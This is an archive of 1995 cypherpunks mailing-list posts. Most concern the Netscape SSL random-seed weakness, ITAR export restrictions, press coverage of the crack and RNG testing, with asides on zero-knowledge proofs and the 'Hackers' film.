else be guilty of "insider non-trading." As Stew Brownstein, a friend of
mine, has noted, if insider trading rules are interpreted logically, then
_failure_ to make a planned trade on the basis of insider information is
just as illegal as deciding to make some trade on the basis of insider
information. The SEC should require all insiders to file a daily report,
preferably before the market opens in NY, listing all of their planned
transactions for that day, so that violations of the "insider non-trading"
laws can be detected and prosecuted.

(Yes, I know that I am not an "insider" by SEC definitions. Poetic license.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 19 Sep 95 08:38:28 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
Message-ID: <9509191537.AA00830@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


John Markoff in the NYT said:
>     The company said it would release a repaired version of the
>     software within a week.

Does this sound to anyone else like a pretty short amount of time to code and  
test a decent source of entropy for the PRNG?  <...and someone else said it  
should be out in a day or so!>

Jeff Weinstein writes:
>    Regardless of what Markoff implies, we do not intend to depend
>  on security through obscurity.

Oh, can we now expect to see source to at least the security portions of  
Navigator and the Commerce server?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Tue, 19 Sep 95 07:38:57 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com>
Message-ID: <9509191438.AA16172@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>    The New York Times, September 19, 1995, pp. A1, D21.
...
>    Netscape officials said today that they would strengthen
>    the system, by making it significantly harder to determine
>    the random number at the heart of their coding system. They
>    said they would no longer disclose what data would be used
>    to generate the random numbers.

and from the WSJ article:

> "The information we were using to create the key is now a known set of
> information," said Jeffrey Treuhaft, security product manager for Netscape.

It sounds as if Netscape thinks that public knowledge of the key
generation is part of the problem.  I hope somebody on the security
team convinces management that entropy is more important than publicity.

(This could be a result of journalistic cluelessness, but it came up in
two independent articles.  It's enough to worry me.)

--
   Eli Brandt
   eli+@cs.cmu.edu
(back from a nice long mailing-list vacation -- it's nice to see that
 cpunks is still at the cutting edge.  for them what cares, I'm now
 a Ph.D. student at the CMU CS program...)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 19 Sep 95 07:49:51 PDT
To: rsalz@osf.org
Subject: Re: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
In-Reply-To: <199509182322.QAA03984@comsec.com>
Message-ID: <9509191440.AA18495@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: Rich Salz <rsalz@osf.org>
>Date: Mon, 18 Sep 1995 13:11:46 -0400
>

>Would someone from outside the US try to download the above file?
>It would be, at least, amusing if an Air Force site were in violation
>of the ITAR (their README notwithstanding).

I know several people in the armed forces who are firmly on our side rather
than Freeh's or NSA's -- so I wouldn't find it amusing to get a USAF person
in trouble just because he/she is USAF.

 - Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Tue, 19 Sep 95 07:50:29 PDT
To: gnu@toad.com
Subject: Re: Intellectual Property and Crypto collision
In-Reply-To: <199509182307.QAA03892@comsec.com>
Message-ID: <9509191443.AA22130@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sun, 17 Sep 1995 13:20:06 -0700
>From: John Gilmore <gnu@toad.com>
>
>> ELECTRONIC MEDIA PROTECTED UNDER COPYRIGHT LAW
>> A presidential task force has recommended that electronic transmission of
[...]
>
>Would this make it illegal to produce tools for decrypting key-escrowed
>software?   :-)

Yup -- except you will have volunteered.

See the Feynman account (citation in
	http://www.clark.net/pub/cme/html/censor.html )

 - Carl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Sep 95 10:46:24 PDT
To: cypherpunks@toad.com
Subject: Mini-mailbombs and Warning Letters
Message-ID: <ac844fed1c0210046617@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(This is not about MIME, but the astute reader will see some parallels...)

I've received a couple of "automatically generated" pieces of e-amil which
tell me that, in the generator's opinion, something is wrong with my public
key, or it could not be found at the keyserver preferred by the owner of
the mail generator, etc.

Quoting from the latest: (identity of generator owner witheld)

"P.S.  This mail was composed by my mailreading sftwr, which
automatically scans incoming mail, looking for failed keyserver
requests, and prompts me whether it should automatically send this msg
on my behalf.  If there is a bug w this sftwr (for example, you never
PGP sign your msgs, so this entire msg makes no sense), or if you're
interested in the software itself (mail-secure.el: a package in lisp
for emacs; this is just one of the many crypto/privacy related things
it does) please mail the author of this package ( tjic@openmarket.com )
for details."

As the saying goes, "Sigh."

Being on a list with 700 subscribers, some of whom are running increasingly
sophisticated automatic checking agents, I foresee an increase in these
"warning letters" from their checking agents who feel posts are not
adequate in some way.

A minor issue, but symptomatic of trends.

I'm dealing with it the same way I'm dealing with the few people who have
something in their MIME setup that triggers my mailer (Eudora Pro 2.1) to
treat their text as attachments. Namely, by filtering them out.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Sep 95 08:31:38 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: (Yet Another?) Netscape Crack Web page
Message-ID: <199509191529.LAA14933@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:31 PM 9/19/95 +0200, Laurent Demailly wrote:
>
>I've been waiting to see here an annoucement of some web page toward
>which direct ppl that want more infos on the great (congrats) job

Here are some URLs I've collected:


http://pauillac.inria.fr/~doligez/ssl/press-conf.html   SSL challenge
virtual press conference
http://www.brute.cl.cam.ac.uk/users/pb/        Piete Brooks home page
http://dcs.ex.ac.uk/~aba/                      Adam Back's home page
http://dcs.ex.ac.uk/~aba/brutessl/             Index of /~aba/brutessl/
http://www.brute.cl.cam.ac.uk/brute/           brute page



DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Sep 95 08:29:34 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Hold a Cracking Party
Message-ID: <199509191529.LAA14949@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Just to let everyone know that I've got an assignment from Wired to do a
story with the above working title.

Since Wired is monthly it will be feature rather than news but will give a
bit of an inside look at the process.

I will be hitting various people up for help and would appreciate it if you
send any URLs on the SSL and other such cracks to me.

DCF

"The freedom of the press belongs to the man who owns one."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 11:34:23 PDT
To: bdavis@thepoint.net (Brian Davis)
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.D-G.3.91.950919135026.18165A-100000@dg.thepoint.net>
Message-ID: <199509191829.LAA09602@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Tue, 19 Sep 1995, Rev. Mark Grant wrote:
> 
> > On Sun, 17 Sep 1995, Brian Davis wrote:
> > 
> > > Phill obviously presents one point of view, vigorously and well.  What do 
> > > the rest of you think about a teen who, say, busts into a .edu site, 
> > > plays with the files, and ultimately brings the system down entirely for 
> > > 36 hours?  Fun and games?  Send him to his room, sans modem? Prosecute 
> > > him?  Have a TLA hire him???
> > 
> > If it wasn't for ITAR the Net would already have secure encryption and
> > authentication, and most such hacker attacks would be impossible (or at 
> > least impractical).
> > 
> > 		Mark
> 
> The non-responsive answer is stricken from the record.  :-)
> You mean "secure" as Netscape was secure from sameer et al.?
> 

	The first two hacks listed on my web page were made possible
because of ITAR. Without ITAR Netscape would not have been suspectible
to this attack.
	Two out of three fits my definition of "most".

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: descarte@mcqueen.com
Date: Tue, 19 Sep 95 03:37:34 PDT
To: cypherpunks@toad.com
Subject: Quick ITAR question....
Message-ID: <199509191040.LAA13613@alma.mcqueen.com>
MIME-Version: 1.0
Content-Type: text



I've just about finished the perl SSLeay implementation and I was musing
about how I would manage to do one for SSLref also.......

Here's the situation:

I'm in Britain, but I have access to a machine which I wll develop on in the
States. Can I develop Net::SSLref on this machine?

My feeling is, no, since I'm not a US citizen ( does this matter with ITAR? ).
Similarly, it could be construed that the characters constituting the source
code are crossing the Atlantic to my machine here, albeit not being stored.
Conversely, I'm not reading *all* the code, so I couldn't necessarily
build SSLref from this action ( a parallel may be the export of 1/723 of
PGP in a .sig! )

Any comments would be much appreciated.

Thanks.

-- 
Alligator Descartes	| PGP Key available on request.
descarte@mcqueen.com	| http://www.mcqueen.com/hermetica



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Tue, 19 Sep 95 08:44:18 PDT
To: cypherpunks@toad.com
Subject: WebSTAR "challenge"
Message-ID: <v02120d04ac845d74a01c@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


From TidBITS#295/18-Sep-95

>**This is a test. This is only a test.** The folks behind the book
>  _WebMaster_Macintosh_ have set up a contest to determine how
>  secure Macintosh web servers really are. They've put up a Web site
>  running WebSTAR with a "target" file that contestants must try to
>  retrieve. The first person to retrieve the file wins a year's
>  subscription to MacTech Magazine and a free pass to the next
>  WebEdge conference, and the next two people receive free WebEdge
>  passes. If the challenge of breaking WebSTAR's security isn't
>  sufficient, there's a second Mac connected to the first via
>  Ethernet. This second Mac doesn't run TCP/IP, only AppleTalk, and
>  holds a second target file; retrieving it wins you three free
>  WebEdge passes. The hope is that these tasks will prove
>  impossible, however, should someone break in, that's also useful
>  since it will help StarNine and Apple plug security holes. Contest
>  rules and details are at: [ACE]
>
>http://www.webmastermac.com/security/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (Tom Rollins)
Date: Tue, 19 Sep 95 11:49:36 PDT
To: cypherpunks@toad.com
Subject: Crypto Sync Issue
Message-ID: <199509191846.LAA24272@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

I am interested in encrypting a SLIP link between my
PC (running Linux) and my Netcom shell account (running
SLIRP).

My question has to do with error conditions on the line.
If I drop a character or packet, the two sides will loose
crypto sync and result in things scrambled from then on.
The modems will fix most of the low level problems.
However, Murphy's Law has not been repealed. :)

Are there any standard methods to provide the SYNC between
the sender(encryption) and the receiver(decryption) on
an Async connection ? 

Since Slip uses IP packets, I was planning on an encryption
of the data portion of the IP packets (leaving the header
alone). 

Thanks,
Tom Rollins <kelso@netcom.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 19 Sep 95 08:49:43 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190703.DAA03247@clark.net>
Message-ID: <9509191548.AA17659@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I take a long term view of security. Basically I don't trust security software 
until it has been released in a stable condition for a few years.

The comments about Credit Card numbers miss the point. The volumes of trade on 
the Internet today are so small that the number of card numbers floating arround 
is insignificant. There are much easier ways to find them than cracking the 
Internet. This will not be the case in a couple of years time where the trade 
volumes are far higher.

Visa and Mastercard will be comming out with a spec which will have very tight 
requirements for implementations.


	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Tue, 19 Sep 95 08:53:18 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Fundamental Netscape hack
In-Reply-To: <199509190954.CAA24686@ix.ix.netcom.com>
Message-ID: <Pine.A32.3.91.950919105737.45409A-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 19 Sep 1995, Bill Stewart wrote:

> Of course, one of the most serious security problems with Netscape servers
> is that they run on machines sitting out there on the Internet where
> anybody who can browse their services can attack them - that 128-bit
> bullet-proof iron-clad front door isn't much help if the garage door is
> unlocked because of some sendmail bug.  

Or- even easier yet- improper httpd installation or users who have not
been properly trained.  NCSA's default configuration file makes document
root a subtree.  One major institution I deal with regularly (and the
administrators should know better) changed the default setting, allowing
users to store html files in their home directory.  And, it seems, the
file permissions were too lax.  If a user had no index.html then I could
just cruise through their home directory, view most files and, in some
(inappropriate) cases, download them.  I told the administrator, and
mailed him a copy of a user's address book (she was a friend and knew what
I was doing before I did it).  The situation has changed and is now more
secure.  But I wonder how many other institutions have an inappropriate 
DocumentRoot so (I guess) users can have a "single home directory"?

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMF7nGKDthkLkvrK9AQEIbwQAl7k86Tk4gY/KU9JYS4lyI63fH4lJYTHw
+Pl85cx3M/RI/kO8N9ZaUih4Hh+8CnNl7xA6NWtURfcSuCCgW3mrdRbKT8KTW/3M
hohmv3yyyU2Ot24B4hb2/lZN5s/fR2JMdsWhKoZdm19xnlQIMBjidP6zxcavE/JC
GNbJm94mBIA=
=L0lD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 19 Sep 95 09:58:16 PDT
To: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Subject: Re: Verification of Random Number Generators
Message-ID: <9509191654.AA00901@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Just an idle thought: it might be possible to do a probabalistic
>  verification of a RNG by sampling it over some number of samples,
>  and statistically analyzing the sample space. This would be analysis
>  under the model of "RNG as black box" as opposed to (or rather, if
>  you're smart, in addition to) code inspection & review. Any
>  statisticians among us?

But this wouldn't have solved Netscape's problem.  Netscape was using a  
pretty good PRNG (the one in RSAREF).  The problem was they were/are using a  
naive method of seeding it.  The output of the PRNG would have been  
statistically random, but since the seed had ridiculously little entropy it  
was easy to guess.

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Tue, 19 Sep 95 08:25:27 PDT
To: jya@pipeline.com (John Young)
Subject: Re: Unabomber ?
In-Reply-To: <199509191330.JAA13584@pipe4.nyc.pipeline.com>
Message-ID: <m0sv50Y-0009yxC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


Yep, it's big.  26 sections, 232 paragraphs, 36 notes, and one diagram.
8 full newspaper pages in 5 column standard print (10 point?), ragged.

Read the first page before work.

> Bill,
> 
> 
> Both the Times and Post report that only the Post is publishing 
> the FC-piece.
> 
> 
> I'm scanning it now and will offer it in a while -- it's a 
> long, long pole.
> 
> 
> I'll ask by this post if someone wants to offer it FTP, I can 
> only do multiple e-mail bites from this hole.
> 

sdw



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 19 Sep 95 04:12:01 PDT
To: eay@mincom.oz.au
Subject: Re: NYT on Netscape Crack
Message-ID: <28592.9509191106@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Eric Young <eay@au.oz.mincom> writes:
> I will defend Netscapes code on the point about the RNG even though
> I have not seen any.  I assume the Netscape code is quite large and
> each release would have to pass various fuctionality tests.  How can
> you test that the RND seeding is wrong?  You have to actually look
> at the code, the number coming out are still random.  As of last
> week I was told by Mike_Spreitzer.PARC@xerox.com that the random
> number generator seed routine in my DES library was only copying in
> 4 bytes of passed data instead of 8.  Given des_cblock data;, it was
> 
> memcpy(init,data,sizeof(data));
> 
> it should have been
> 
> memcpy(init,data,sizeof(des_cblock));
> 
> Rather hard to notice unless you know that des_cblock is passed as a 
> pointer and even this can be compiler dependent.

Sure that's hard to notice, but what you describe was an accident, ie
the code wasn't working as you thought it was.

The netscape one by the sound of it, and the earlier posts of the
reverse-engineered ran no code, was working to spec, it was just a
dumb spec.

I felt sorry for netscape when they got chosen as the example of an
ITAR crippled app to break, the breakers intention obviously being to
tar ITAR, but some of the bad publicity rubbing off on netscape, who
were obviously fully aware of the weakness of 40 bit keys.

This one tho' sounds very much like due to sloppy design which is
inexcusable, especially given that they are going around selling the
128 bit RC4 browser to people who may have been relying on it, at it's
word, and presume the rest of the cryptographic system was up to
suitable standard to match 128 bit keys.

aka what's the point having 128 bit keys if you use a 32 bit, or 40
bit or 48 bit seed, which can be further narrowed with non-root access
to the machine, and even with external info leaked by the machine.

> The moral of the story I suppose is to be 
> paranoid about checking routines relating to RNG.

Well that is a valid, and very good moral, but the netscape story is a
different story I think, as they knew what their code was doing, and
somehow didn't think it was a problem, or didn't even pause to
consider the ran no generation security.  Reckon any bad publicity
they get out of this one is entirely their own fault.

The moral in netscapes story is that closed systems are bad news.
These things ideally need open review.  And of course designing things
with the expectation that they are secure with the *given* that the
full algorithm is known.

Real shame because the rest of the software is very innovative
compared to other browsers, and apparently good quality.  Also may be
a set back for net commerce, which is bad news.

Adam
--
Munitions-T home page:  http://www.obscura.com/~shirt/

#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 12:29:18 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: Verification of Random Number Generators
In-Reply-To: <9509191821.AA21270@spirit.aud.alcatel.com>
Message-ID: <199509191924.MAA20090@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> BTW: In some ways, I feel sorry for Netscape being nailed by everyone
> including the press like this.  BUT - they must also accept that

	I'm sorry, but they deserve it. Their seed generation was just
plain stupid.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Tue, 19 Sep 95 09:35:25 PDT
To: cypherpunks@toad.com
Subject: Random publicity was: articles
In-Reply-To: <199509191435.HAA00275@infinity.c2.org>
Message-ID: <43mrf2$arr@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509191435.HAA00275@infinity.c2.org>,
sameer  <sameer@c2.org> wrote:
>	If you could, please send me the name of the reporter and
>contact information for any articles you see regarding the netscape
>hack.
>
>Thanks,
>-- 
>sameer						Voice:   510-601-9777
>Community ConneXion				FAX:	 510-601-9734
>An Internet Privacy Provider			Dialin:  510-658-6376
>http://www.c2.org (or login as "guest")			sameer@c2.org

So far, I talked to the NYT and the WSJ yesterday, as well as the SF Chronicle.

This morning, one of the University's publicity people
<rls@pio.urel.berkeley.edu> forwarded Marketplace (a radio show)
and CNN (sending a camera crew) to me.

I've also received email from various people, including someone who
works in security at the Pentagon.

I wonder if I should tell them I'm not an American?

   - Ian "but I'm Canadian, so that's the same thing, right?" :-(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 19 Sep 95 10:39:18 PDT
To: aba@dcs.exeter.ac.uk
Subject: Re: NYT on Netscape Crack
Message-ID: <9509191738.AA00941@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Adam Back writes:
>  Posting the code for the random number generator would be an
>  excellent start.

Ian posted the code for the PRNG on August 30th and Stephen Kapp noted that  
it was similar to one in RSAREF.  The PRNG is probably fine.  The big flaw  
here was the collection of seed material.  The bottom line is the WHOLE  
security subsystem should be published for analysis.

>  Or if that doesn't sit well with copyright interests, how about
>  writing up an open spec about how the random number generator works?
>  Then we can critique it.

Netscape did this with SSL and what happened was the rest of the industry  
jumped on it before any analysis was done.  Now we are likely stuck with a  
poor protocol.

>  An algorithm should be something to be proud of, "it's secure, and
>  see:  this is how it works, here are the design criteria, here is
>  how you would attempt to break it, and here is the best predicted
>  attack's cost."

The design may be great, but if the implementation is flawed then you aren't  
much better off.  To attempt to evaluate the security of a system you need to  
be able to inspect the implementation.  Period.

>  is netscape still a progressive startup company with hot programmers
>  running the show, or has it slipped into stuffy corporate realms
>  already?

Netscape may have hot programmers but so far I believe it has become  
self-evident that they know little about crypto and implementing  
cryptosystems.

To Netscape's credit, Jeff Weinstein claims that the team implementing the  
security for Navigator 2.0 is completely new and of course Netscape has hired  
Tahir ElGamal, who certainly knows what he is doing.  Additionally I would  
suspect that with all the bad publicity they are receiving they would take up  
Bidzos on RSADSI's offer to analyze the source.  So it is entirely possible  
that Navigator 2.0 will be much better.  However, I am not holding my breath.


Strong crypto is _hard_ to implement properly.  Even if a product is using a  
well-known algorithm there could be any number of subtle flaws that can  
destroy any security offered by such algorithm.  You can't just toss in RSA,  
IDEA, RC-4, DES, etc... and claim the thing is secure.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 12:47:34 PDT
To: cypherpunks@toad.com
Subject: Re: Verification of Random Number Generators
Message-ID: <199509191947.MAA23655@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:54 AM 9/19/95 -0500, andrew wrote, replying to Eric Fair:
>>  Just an idle thought: it might be possible to do a probabalistic
>>  verification of a RNG by sampling it over some number of samples,

>But this wouldn't have solved Netscape's problem.  Netscape was using a  
>pretty good PRNG (the one in RSAREF).  The problem was they were/are using a  
>naive method of seeding it.  The output of the PRNG would have been  
>statistically random, but since the seed had ridiculously little entropy it  
>was easy to guess.

It's even worse - the seeding mechanism has too little entropy, given that
you know some of the input data (e.g. system clock), but if it had, say,
32 bits of entropy, you'd have to run your test tens or hundreds of billions
of times for the patterns to really show up - which is hard to do for something
that uses the system clock or other hardware - and you'd really have to get
at the output of the seeding process rather than the PRNG output, which has
been filtered through enough MD5 that it's hard to detect the patterns.
But you could still crack it easily enough.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Tue, 19 Sep 95 09:51:00 PDT
To: cypherpunks@toad.com
Subject: Re: Explaining Zero Knowledge to your children
In-Reply-To: <9509181655.AA06115@elysion.iaks.ira.uka.de>
Message-ID: <9509191650.AA21716@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hadmut Danisch suggested:
> Alice is caught in a dark room somewhere on the world. She doesn't know
> where she is, but there is a telephone in the room and she calls Bob to
> ask him where she is. Bob claims to know it but doesn't want to reveal. 
> He calls her back. When the phone is ringing, he has proven the knowledge

I don't think this captures the structure of a ZNP.  There's no
multi-round system, for one thing.

how about this:
Alice and Bob have a big, complicated maze, preferably non-planar.
Alice can solve the maze, and wants to prove this to Bob.
Alice picks a point P on a solution path.
Bobs asks Alice to
	(a) exhibit a path from Start to P.
   or	(b) exhibit a path from P to Finish.
Alice can easily do either one.

If Alice doesn't know the maze, she can try to cheat, 
by picking a P by tracing forwards from Start,
or by tracing backwards from Finish.
These ploys allow her to sleaze through tests (a) and (b) respectively.
But if Bob flips a coin to select (a) versus (b), he has a 50-percent
chance of catching with each round.

This is not really zero-knowledge.  With each round, Alice is giving
Bob substantial knowledge about the maze.  With sufficient rounds,
she ends up giving him the whole thing.  But if the maze is hairy
enough, this captures the idea that Alice can prove (to within epsilon)
to Bob that she has a solution, without giving it away entirely.

--
   Eli Brandt
   eli+@cs.cmu.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Tue, 19 Sep 95 12:51:00 PDT
To: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Subject: Re: Random publicity was: articles
In-Reply-To: <43mrf2$arr@calum.csclub.uwaterloo.ca>
Message-ID: <199509191950.MAA06575@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| This morning, one of the University's publicity people
| <rls@pio.urel.berkeley.edu> forwarded Marketplace (a radio show)
| and CNN (sending a camera crew) to me.

Ouch - had a good night's sleep, did you? :-)

| I've also received email from various people, including someone who
| works in security at the Pentagon.
| 
| I wonder if I should tell them I'm not an American?
| 
|    - Ian "but I'm Canadian, so that's the same thing, right?" :-(

Too bad, you should have been a Swede, like me. Wouldn't it be fun
to say something like; "Well, I'm not allowed to reveal this weakness
to any American, since I'm not allowed to export munitions!"

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Tue, 19 Sep 95 10:01:59 PDT
To: Steven Levy <steven@echonyc.com>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509180959.B28455-0100000@echonyc>
Message-ID: <Pine.SUN.3.91.950919125457.17290A-100000@dorsai.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Steven Levy wrote:

> No chance. The problem for me isn't that someone wanted to call a movie 
> Hackers but that it causes confusion in that for eleven years there has 
> been a preexisiting work by that name.  There is a novelization of the 
> screenplay now in paperback, so when if a friend recommends that you buy 
> Hackers, you'll probably buy that one. (especially since Dell is 
> determined to do as little as possible for my own book). 

Or vice versa.  Someone could want to get the book based on the movie and 
wind up buying your book - thereby benefiting you instead of Dell or 
whomever is publishing the one based on the screen play.

I wouldn't worry over it. :-)  It may turn out that this will cause your 
book to suddenly surge. 

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 19 Sep 95 11:21:57 PDT
To: jsw@neon.netscape.com
Subject: Re: Verification of Random Number Generators
Message-ID: <9509191821.AA21270@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Just an idle thought: it might be possible to do a probabalistic
> verification of a RNG by sampling it over some number of samples, and
> statistically analyzing the sample space. This would be analysis under the
> model of "RNG as black box" as opposed to (or rather, if you're smart, in
> addition to) code inspection & review. Any statisticians among us?
> 

In a word - no.

In a longer description - you can black box test the *pseudo-RNG in
one of two ways.  

One, input a key, and then keep asking for numbers.  The numbers 
should be statistically distributed, and should have a very long 
repeat cycle.  (i.e. basic "good" pseudo-random number generator
theory)

Two, input different keys, and then ask for a number.  Again,
the numbers should be statistically distributed, even for small
changes in the input numbers.  

What *both* of those methods don't test, is the key(seed) generation,
which is what was attacked on Netscape.  The seed number
must be truely random, and unknowable to the attacker, otherwise
they can duplicate the random number generator.  Remember that
all random number generators in software are really pseudo-random
number generators, and rely on having seed value.

BTW: In some ways, I feel sorry for Netscape being nailed by everyone
including the press like this.  BUT - they must also accept that
with being popular, that they will be subject to intense 
scrutiny.  Besides - if you are going to attack a cryptosystem, why
not get your 15 minutes of fame out of deal while you are at it ;-)

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Sep 95 10:54:27 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509191823.A881-0100000@unicorn.com>
